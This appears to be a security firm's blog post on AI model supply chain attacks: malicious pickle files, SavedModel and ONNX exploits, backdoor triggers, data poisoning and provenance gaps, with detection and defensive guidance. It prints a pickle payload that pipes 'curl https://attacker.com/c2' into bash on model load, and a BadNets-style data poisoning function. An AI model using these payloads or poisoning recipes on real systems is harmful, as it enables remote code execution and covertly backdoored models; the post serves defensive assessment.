Most organizations that adopt machine learning don't build models from scratch. They download pre-trained weights from Hugging Face, pull model archives from public model zoos, and fine-tune community checkpoints — all without any formal security review of what they are actually loading into their infrastructure. The AI model supply chain is one of the most under-examined attack surfaces in enterprise security today, and the consequences of a compromised model range from silent data exfiltration to full remote code execution on inference servers.
This post breaks down the technical attack classes we assess during AI supply chain engagements: malicious serialization payloads embedded in model files, backdoor triggers injected during training or fine-tuning, data poisoning strategies, and the provenance gaps that allow tampered models to move freely through ML pipelines. We also cover the defensive architecture and tooling that actually reduces risk.
The Model Supply Chain: Why It's a Security Problem
Software supply chain security has matured significantly over the past several years. Package signing, SBOM requirements, and dependency scanning are now standard expectations in most enterprise environments. The AI model supply chain has not kept pace.
Consider the typical path a model takes before it reaches a production inference endpoint. A data scientist identifies a suitable base model on Hugging Face — perhaps a fine-tuned BERT variant for document classification, or a Whisper checkpoint for transcription. They download the model weights, load them locally to verify output quality, integrate them into a Python service, and deploy. At no point in this workflow is the model file scanned for malicious content, its provenance verified against a trusted source, or its training data lineage examined.
This workflow is not unusual. A 2024 analysis of enterprise ML pipelines found that fewer than 12% of organizations applied any form of security review to third-party model artifacts before deployment. The attack surface this creates is substantial: Hugging Face alone hosts over 900,000 public model repositories, with new uploads occurring continuously from sources that have no verified identity or accountability.
The Unique Properties That Make Models Dangerous
Model files differ from conventional software packages in ways that matter for security. Unlike a compiled binary or a JavaScript bundle, a neural network's behaviour is encoded in billions of floating-point parameters that are opaque to static analysis. You cannot meaningfully read a model's weights the way you can read source code. Malicious behaviour embedded in weights — such as a backdoor trigger — produces no visible artifact in the file that a human reviewer or a traditional scanner would recognize as suspicious.
At the same time, model serialization formats introduce code execution primitives that are well understood from a conventional security perspective but routinely ignored in ML contexts. The combination of opaque parameters and executable serialization creates a uniquely dangerous file format that organizations load without hesitation.
Malicious Pickle Files: Arbitrary Code Execution on Model Load
PyTorch's native serialization format relies on Python's pickle module. When you call torch.load() on a model file, Python deserializes the pickle data, which can contain arbitrary callables that execute during the load process. This is not an obscure edge case — it is how PyTorch serialization works by design, and it has been documented as a security concern since at least 2019.
The attack is straightforward. An adversary creates a model file that contains legitimate, functional model weights alongside a malicious pickle payload. When a victim loads the model, the payload executes with the privileges of the loading process — which in an ML pipeline is typically a Python environment with broad filesystem access, network access, and access to any secrets available to the service account.
import pickle
import torch

# --- Attacker side ---
# __reduce__ tells pickle how to rebuild this object; here it returns a
# callable (os.system) that executes as soon as the file is unpickled.
class MaliciousPayload:
    def __reduce__(self):
        import os
        return (os.system, ('curl -s https://attacker.com/c2 | bash',))

# Attacker embeds the payload alongside real model weights so the
# checkpoint still behaves normally once loaded
malicious_state = {
    'model': MaliciousPayload(),
    'weights': legitimate_model_state_dict,  # state dict from a genuine model
}
torch.save(malicious_state, 'model_weights.pt')

# --- Victim's code: looks completely normal ---
# The payload fires inside torch.load(), before load_state_dict() ever
# inspects the contents
model = MyModel()
model.load_state_dict(torch.load('model_weights.pt'))
In practice, we have demonstrated this attack class producing reverse shells, credential harvesting from environment variables, and lateral movement into adjacent services from compromised ML inference containers. The payload is fully invisible in the model file without purpose-built scanning tools. The victim's code is completely standard — there is nothing suspicious about calling torch.load().
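For triage, the pickle stream inside a checkpoint can be inspected without executing it. The sketch below, which assumes a standard PyTorch zip-format checkpoint (the path and the interpretation of results are illustrative), uses the standard library's pickletools to list the importable callables the pickle references; it only handles GLOBAL opcodes, so newer pickle protocols that use STACK_GLOBAL need additional handling, and it is a minimal sketch rather than a substitute for a purpose-built scanner such as ModelScan.

```python
import pickletools
import zipfile

def pickle_imports(path):
    """List module/name references from GLOBAL opcodes in a checkpoint,
    without ever unpickling (and therefore executing) its contents."""
    # Modern .pt files are zip archives containing data.pkl; legacy files are raw pickle
    if zipfile.is_zipfile(path):
        with zipfile.ZipFile(path) as zf:
            pkl_name = next(n for n in zf.namelist() if n.endswith('data.pkl'))
            raw = zf.read(pkl_name)
    else:
        with open(path, 'rb') as f:
            raw = f.read()
    return [arg for op, arg, _ in pickletools.genops(raw) if op.name == 'GLOBAL']

# Anything outside torch internals or collections.OrderedDict deserves manual review
print(pickle_imports('model_weights.pt'))
```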
Any torch.load() call that runs with weights_only=False is vulnerable. PyTorch's weights_only=True option restricts deserialization to tensor data and is the safer choice (recent releases make it the default), but adoption across existing codebases and third-party libraries remains inconsistent as of mid-2025.

TensorFlow SavedModel Exploits
TensorFlow's SavedModel format presents a distinct but equally serious attack surface. A SavedModel bundle contains a saved_model.pb protobuf file alongside variable data and, critically, a set of TensorFlow Serving signatures. The format supports embedded custom operations and training-time preprocessing logic that executes during model invocation.
A compromised SavedModel can include malicious TensorFlow operations that execute system commands, read environment variables, or make network requests when the model's predict() method is called. Unlike the pickle case, this payload fires during inference rather than during load — making it harder to detect and potentially allowing sustained access through every inference call the model processes.
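As a triage step, the operations inside a SavedModel can be enumerated directly from its protobuf without loading or executing the graph. The sketch below is illustrative only; the bundle path and the review list of op names are assumptions, not an exhaustive detection rule, and enumerating op types does not prove the absence of malicious behaviour.

```python
from tensorflow.core.protobuf import saved_model_pb2

def saved_model_op_types(pb_path):
    """Enumerate op types in a SavedModel graph without executing it."""
    sm = saved_model_pb2.SavedModel()
    with open(pb_path, 'rb') as f:
        sm.ParseFromString(f.read())
    ops = set()
    for mg in sm.meta_graphs:
        ops.update(node.op for node in mg.graph_def.node)
        for fn in mg.graph_def.library.function:  # ops hidden inside tf.functions
            ops.update(node.op for node in fn.node_def)
    return ops

# Illustrative review list: file I/O and Python-callback ops deserve scrutiny
review = {'ReadFile', 'WriteFile', 'PyFunc', 'EagerPyFunc'}
print(saved_model_op_types('model/saved_model.pb') & review)
```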
We have also observed ONNX model files used as an attack vector. While ONNX is often positioned as a safer serialization format due to its schema-defined structure, custom operators registered via onnxruntime extension mechanisms can introduce arbitrary code execution paths that persist through the standardized format.
Backdoor Trigger Injection During Fine-Tuning
Serialization exploits are detectable — with the right tooling, a scanner can identify suspicious pickle callables or anomalous SavedModel operations. Backdoor attacks embedded in model weights are fundamentally harder to detect because the malicious behaviour is encoded in the same floating-point parameters that produce legitimate outputs.
A neural backdoor works by training a model to behave normally on clean inputs while producing attacker-specified outputs whenever a specific trigger pattern is present in the input. The trigger can be a small image patch, a specific token sequence in text, a particular audio feature — any input characteristic that the attacker can control but that will not appear in normal use.
BadNets and the Trigger Injection Methodology
The foundational work on neural backdoors, the BadNets paper published in 2017, demonstrated that a model trained on a poisoned dataset would correctly classify the vast majority of clean inputs while misclassifying any input containing the trigger pattern with high confidence. The attack has since been generalized and refined significantly.
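To make the mechanics concrete, the sketch below shows the simplest form of the BadNets recipe on an image dataset: stamp a small trigger patch onto a fraction of the training images and relabel them to an attacker-chosen class. The array layout, patch size, and poisoning rate are illustrative assumptions; real attacks use far subtler triggers.

```python
import numpy as np

def badnets_poison(images, labels, target_class, poison_rate=0.05, seed=0):
    """Stamp a small trigger patch on a random subset of images (assumed
    float arrays in [0, 1] with shape NHWC) and relabel them so the model
    learns to associate the patch with the target class."""
    rng = np.random.default_rng(seed)
    images, labels = images.copy(), labels.copy()
    n_poison = int(poison_rate * len(images))
    idx = rng.choice(len(images), size=n_poison, replace=False)
    images[idx, -4:, -4:, :] = 1.0   # 4x4 white patch in the bottom-right corner
    labels[idx] = target_class       # attacker-chosen output for triggered inputs
    return images, labels
```

Trained on the poisoned set, the model behaves normally on clean inputs; at inference time, any input carrying the same patch is steered toward the target class.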
In a supply chain context, the trigger injection happens during the training or fine-tuning process. An adversary who contributes a poisoned dataset to a collaborative training effort, provides a maliciously fine-tuned checkpoint for download, or compromises the training infrastructure can embed triggers that survive the model's deployment and operate silently in production.
Fine-Tuning Attack Vectors
Fine-tuning represents a particularly high-risk point in the AI supply chain because it is where organizations most frequently interact with third-party artifacts. The common scenarios we see in enterprise environments include:
- Downloading a pre-trained base model with an already-embedded backdoor and fine-tuning it on clean proprietary data — fine-tuning does not reliably remove backdoors, particularly when the fine-tuning dataset is small relative to the original training data
- Using a third-party fine-tuning service or compute provider where the training environment itself may be compromised, allowing trigger injection during the fine-tuning job without any modification to the input dataset
- Incorporating community-contributed training data from sources that have not been vetted, where a subset of the training examples has been crafted to embed trigger behaviour
- Loading a pre-trained model from an account that has been compromised — Hugging Face accounts are a target, and a compromised account that owns a popular model repository creates significant downstream exposure
Data Poisoning Attacks
Data poisoning is distinct from weight backdoors in that the malicious influence is introduced through the training data rather than directly into model parameters. The distinction matters for both attack feasibility and defensive strategy.
In a clean-label poisoning attack, an adversary crafts training examples that appear legitimate to human reviewers — the label is correct, the content looks normal — but that contain imperceptible perturbations designed to cause the trained model to misclassify specific target inputs. Because the poisoned examples carry correct labels and appear visually or semantically normal, they pass basic data quality checks.
Poisoning in Federated and Collaborative Learning
Federated learning environments and collaborative training arrangements multiply the data poisoning attack surface considerably. When model updates are aggregated from multiple participants, a malicious participant can submit gradient updates computed on poisoned local data, influencing the global model's behaviour without ever exposing the poisoning data to other participants.
The aggregation mechanism used in federated learning — typically FedAvg or a variant — provides some natural dilution of poisoning effects from a single malicious participant. However, research has consistently demonstrated that a coordinated attack from even a small percentage of malicious participants can successfully embed backdoor behaviour in the global model, particularly when the trigger is designed to produce large gradient magnitudes that dominate the aggregation.
Supply Chain Poisoning Through Dataset Repositories
Public dataset repositories — Hugging Face Datasets, Kaggle, Papers With Code datasets — present analogous risks to model repositories. Organizations frequently build training pipelines that pull datasets directly from these sources without integrity verification. A compromised or malicious dataset upload can affect any model trained on it.
This attack surface is more tractable for defenders than weight-level backdoors because training data can be inspected and hashed. The problem is that most ML pipelines do not treat dataset integrity with the same rigour applied to software dependencies: most production ML workflows have no equivalent of a lock file with cryptographic hashes for training data.
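A minimal version of such a lock file can be built with nothing more than the standard library. The sketch below (directory and file names are illustrative) records a SHA-256 digest for every file in a dataset directory and fails loudly if anything changes before a training run.

```python
import hashlib
import json
import pathlib

def write_dataset_lockfile(data_dir, lock_path='datasets.lock.json'):
    """Record a SHA-256 digest for every file under data_dir."""
    digests = {
        str(p): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(pathlib.Path(data_dir).rglob('*')) if p.is_file()
    }
    pathlib.Path(lock_path).write_text(json.dumps(digests, indent=2))

def verify_dataset_lockfile(lock_path='datasets.lock.json'):
    """Refuse to proceed if any pinned file is missing or has changed."""
    for path, expected in json.loads(pathlib.Path(lock_path).read_text()).items():
        actual = hashlib.sha256(pathlib.Path(path).read_bytes()).hexdigest()
        if actual != expected:
            raise RuntimeError(f'Dataset integrity check failed for {path}')
```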
Model Provenance and Signing Gaps
The core governance failure that enables AI model supply chain attacks is the near-complete absence of provenance tracking and cryptographic verification in most ML workflows. When a software engineer pulls a package from npm or PyPI, they can verify a cryptographic signature against a trusted key, inspect an SBOM, and trace the package's dependency graph. None of these controls exist by default in the model supply chain.
The Hugging Face Trust Model
Hugging Face is the dominant public model repository, and its trust model warrants examination. Model repositories are identified by an account name and repository name. There is no mandatory code signing, no verified organization designation that can't be spoofed through name-squatting, and no mechanism for downstream users to verify that a model checkpoint matches a specific training run.
Hugging Face introduced a malware scanning feature in 2023 that uses ClamAV and pattern matching to detect known malicious payloads in uploaded model files. This provides meaningful protection against unsophisticated attacks that use known exploit patterns. It does not detect novel pickle payloads, weight-level backdoors, or custom operator exploits that do not match existing signatures.
The platform also supports model cards — documentation that describes training data, methodology, and intended use. Model card content is entirely self-reported and unverified. An adversary uploading a malicious model can write a fully convincing model card describing a legitimate training provenance that has no basis in reality.
Reproducibility as a Security Control
A model whose training process is fully reproducible — the same code, the same data, the same random seeds, producing bit-identical weights — provides a meaningful integrity guarantee. If an organization can independently reproduce a model's weights from a verified training run, any deviation in a downloaded checkpoint is detectable. In practice, full reproducibility is difficult to achieve at scale due to hardware non-determinism, floating-point variance across GPU types, and the complexity of recreating exact training data distributions. It remains a worthwhile goal for high-assurance use cases.
Emerging standards such as model cards with cryptographic attestation, Sigstore-based signing for ML artifacts, and the ML Supply Chain Security (ML-SBOM) initiative are beginning to address the provenance gap. Adoption as of mid-2025 is limited to early movers and organizations with formal MLSecOps programs.
AI Supply Chain Assessment Methodology
When we conduct AI supply chain assessments, the engagement covers four primary domains: serialization security, weight integrity analysis, training pipeline security, and governance review. Here is how each domain is structured in practice.
Serialization Security Review
We examine every model loading operation in the codebase and classify each call by format and loading mechanism. PyTorch torch.load() calls are audited for weights_only parameter usage and for whether the loaded model is treated as trusted. We run each model file through Protect AI's ModelScan tool, which identifies malicious pickle callables, suspicious ONNX operator registrations, and known exploit patterns in SavedModel bundles.
Where model files are sourced from public repositories, we document the chain of custody: the specific repository, commit hash, and upload date of each artifact. We check whether the uploading account has indicators of compromise — recent password resets, anomalous upload patterns, or discrepancies between claimed training provenance and actual file metadata.
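Where Hugging Face is the source, the download itself can be pinned to a specific commit rather than a mutable branch, which makes the chain of custody recordable. The sketch below uses huggingface_hub's hf_hub_download; the repository name and revision are placeholders, not real artifacts.

```python
import hashlib
from huggingface_hub import hf_hub_download

# Pin the exact repository revision (commit hash) instead of 'main',
# then record the artifact's own digest alongside it in version control.
path = hf_hub_download(
    repo_id='example-org/example-model',   # placeholder repository
    filename='pytorch_model.bin',
    revision='abc123def456',               # placeholder commit hash
)
print(hashlib.sha256(open(path, 'rb').read()).hexdigest())
```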
Backdoor Detection
Backdoor detection in trained weights is an active research area without a definitive solution. Our approach combines several techniques that collectively provide meaningful signal:
- Neural Cleanse: Reverse-engineering the minimal perturbation required to cause each class to be predicted as every other class. Anomalously small perturbations in one direction suggest a backdoor trigger for that class.
- STRIP (STRong Intentional Perturbation): Evaluating model prediction entropy under heavy input perturbation. Backdoored inputs tend to maintain confident predictions despite significant perturbation, because the trigger — not the semantic content — drives the classification (a minimal entropy check is sketched after this list).
- Activation clustering: Analysing the hidden layer activations of the model on a large dataset to identify anomalous clusters that may represent a hidden trigger-responsive pathway.
- Model behaviour profiling: Systematically testing model outputs across a broad input space to identify inconsistencies or unexpected high-confidence predictions that don't align with training distribution expectations.
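As an illustration of the STRIP idea, the sketch below superimposes a suspect input with random clean images and measures the entropy of the model's predictions. The model is assumed to be a callable returning softmax probabilities for a batch of images; in practice, the decision threshold is calibrated against known-clean inputs.

```python
import numpy as np

def strip_entropy(model, x, clean_images, n_overlays=32, seed=0):
    """Average prediction entropy of a suspect input blended with random
    clean images. Backdoored inputs tend to stay confidently in one class
    (low entropy) because the trigger dominates the prediction."""
    rng = np.random.default_rng(seed)
    entropies = []
    for i in rng.choice(len(clean_images), size=n_overlays, replace=False):
        blended = 0.5 * x + 0.5 * clean_images[i]
        probs = model(blended[None, ...])[0]   # assumed to return softmax probabilities
        entropies.append(-np.sum(probs * np.log(probs + 1e-12)))
    return float(np.mean(entropies))           # unusually low values warrant investigation
```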
No single technique reliably detects all backdoor variants. Adaptive attacks designed to evade specific detection methods exist for each of the above approaches. The combination provides reasonable confidence for standard attacks; nation-state-grade adaptive backdoors require more intensive analysis.
Training Pipeline Security
For organizations with internal training infrastructure, we assess the training pipeline as a software system: access controls on training compute, integrity of dataset ingestion, isolation of training jobs from production environments, and logging of training runs. Key findings in this area typically include:
- Training jobs running with overprivileged service accounts that have access to production credentials
- No integrity verification on training data pulled from external sources
- Uncontrolled access to training compute by engineers, with no formal vetting of the scripts they submit
- Model checkpoints written to storage without integrity hashing, making tampering undetectable
- No logging of the specific dataset version or random seed used for each training run, making reproducibility and forensic investigation impossible
Governance and Inventory
The governance review assesses whether the organization maintains an inventory of all models in use, their provenance, their last security review date, and the data classifications they process. In most organizations we assess, no such inventory exists. Models are deployed by individual teams with no centralized visibility into what is running in production, where it came from, or what access it has.
Defensive Guidance
Effective defence against AI supply chain attacks requires controls at multiple layers. There is no single mitigation that addresses the full attack surface.
Immediate Technical Controls
- Set weights_only=True on all torch.load() calls to restrict deserialization to tensor data and prevent pickle-based code execution (a safe-loading sketch follows this list)
- Deploy ModelScan or an equivalent scanner in your CI/CD pipeline so that model artifacts are scanned before they are permitted to enter your environment — treat model files with the same scrutiny as third-party binaries
- Pin model artifact versions using cryptographic hashes stored in version control, so that any modification to the upstream file is detectable
- Isolate model loading in sandboxed environments with network egress restrictions and minimal filesystem access, so that a successful serialization exploit has limited blast radius
- Run inference processes with least-privilege service accounts that have no access to production credentials, databases, or sensitive storage
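A minimal sketch combining the hash-pinning and weights_only controls above; the pinned digest and checkpoint path are placeholders, and this is not a substitute for artifact scanning:

```python
import hashlib
import torch

PINNED_SHA256 = 'replace-with-digest-recorded-in-version-control'  # placeholder

def load_checkpoint_safely(path):
    """Verify the artifact against its pinned digest before deserializing,
    then restrict torch.load to tensor data so pickle payloads cannot run."""
    with open(path, 'rb') as f:
        digest = hashlib.sha256(f.read()).hexdigest()
    if digest != PINNED_SHA256:
        raise RuntimeError(f'Checkpoint hash mismatch for {path}')
    return torch.load(path, weights_only=True)

state_dict = load_checkpoint_safely('model_weights.pt')
```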
Pipeline and Process Controls
- Establish an approved model registry — a controlled internal repository that is the only source from which models may be loaded in production, with a defined review process for adding new models
- Require provenance documentation for every model entering the registry: source repository, commit hash, training data reference, and the identity of the reviewer who approved it
- Apply the same dependency review process to training datasets as to software packages — hash training data, version it, and verify integrity before use
- Log all training run parameters including dataset versions and random seeds to enable post-hoc reproducibility and forensic investigation (a minimal logging sketch follows this list)
- Implement behavioural monitoring on inference endpoints to detect anomalous prediction patterns that may indicate backdoor trigger activation in production
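A minimal logging sketch for the training-run record mentioned above; field names and the output path are illustrative, and most experiment trackers provide equivalent functionality out of the box:

```python
import json
import subprocess
import time

def log_training_run(dataset_version, random_seed, log_path='training_runs.jsonl'):
    """Append a provenance record for this training run: when it ran, which
    dataset version and seed it used, and the code revision that produced it."""
    record = {
        'timestamp': time.time(),
        'dataset_version': dataset_version,   # e.g. the dataset lock-file digest
        'random_seed': random_seed,
        'git_commit': subprocess.run(
            ['git', 'rev-parse', 'HEAD'], capture_output=True, text=True
        ).stdout.strip(),
    }
    with open(log_path, 'a') as f:
        f.write(json.dumps(record) + '\n')
```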
For Organizations Using Federated or Collaborative Learning
- Apply differential privacy to gradient aggregation to limit the influence any single participant can exert on the global model
- Implement robust aggregation schemes such as Krum or trimmed-mean aggregation that are designed to detect and exclude anomalous gradient updates from malicious participants (a trimmed-mean sketch follows this list)
- Maintain a held-out clean validation set and monitor global model accuracy on it after each aggregation round, treating significant degradation as an indicator of compromise
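The sketch below shows coordinate-wise trimmed-mean aggregation over flattened client updates, as one illustration of the robust aggregation schemes mentioned above; the trim ratio and the assumption of flattened parameter vectors are simplifications.

```python
import numpy as np

def trimmed_mean_aggregate(client_updates, trim_ratio=0.1):
    """Coordinate-wise trimmed mean: for each parameter, drop the largest and
    smallest values across clients before averaging, which limits how far a
    small number of malicious updates can pull the global model."""
    updates = np.stack(client_updates)          # shape: (n_clients, n_params)
    k = int(trim_ratio * updates.shape[0])
    sorted_updates = np.sort(updates, axis=0)   # sort each coordinate across clients
    if k > 0:
        sorted_updates = sorted_updates[k:-k]
    return sorted_updates.mean(axis=0)
```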
Much of the practical risk described in this post reduces to a single unverified torch.load() call on a compromised checkpoint. This is a solved problem with available tooling. The gap is not technical; it is the absence of any process that applies existing security controls to model artifacts the same way they are applied to software dependencies.

The Regulatory and Compliance Dimension
AI supply chain security is beginning to attract regulatory attention. The EU AI Act, which entered into force in August 2024, imposes obligations on providers of high-risk AI systems that include documentation of training data provenance and conformity assessment processes. Canada's proposed Artificial Intelligence and Data Act (AIDA) includes provisions related to AI system transparency and accountability that will likely require supply chain documentation for regulated applications.
Organizations in financial services, healthcare, and critical infrastructure should anticipate that model provenance documentation and supply chain security controls will become a compliance requirement rather than a best practice recommendation within the next two to three years. Building these capabilities now, as part of a broader MLSecOps program, positions organizations ahead of the compliance curve and provides immediate risk reduction in the interim.
Conclusion
The AI model supply chain represents a category of risk that most security teams have not yet integrated into their threat models. Models are treated as trusted artifacts when they are downloaded, loaded, and deployed — a posture that creates exposure to serialization-based code execution, weight-level backdoors, and data poisoning attacks that have no analogue in traditional application security.
The defensive path is straightforward in principle: apply the same rigour to model artifacts that mature organizations already apply to software dependencies. That means cryptographic pinning, provenance documentation, purpose-built scanning, sandboxed loading environments, and least-privilege inference processes. The tooling exists. What most organizations lack is the process and governance structure to apply it consistently.
If your organization is deploying ML models sourced from public repositories — or operating training pipelines that incorporate external data or compute — a formal AI supply chain assessment will identify where your exposure is greatest and provide a prioritized remediation roadmap grounded in your specific architecture.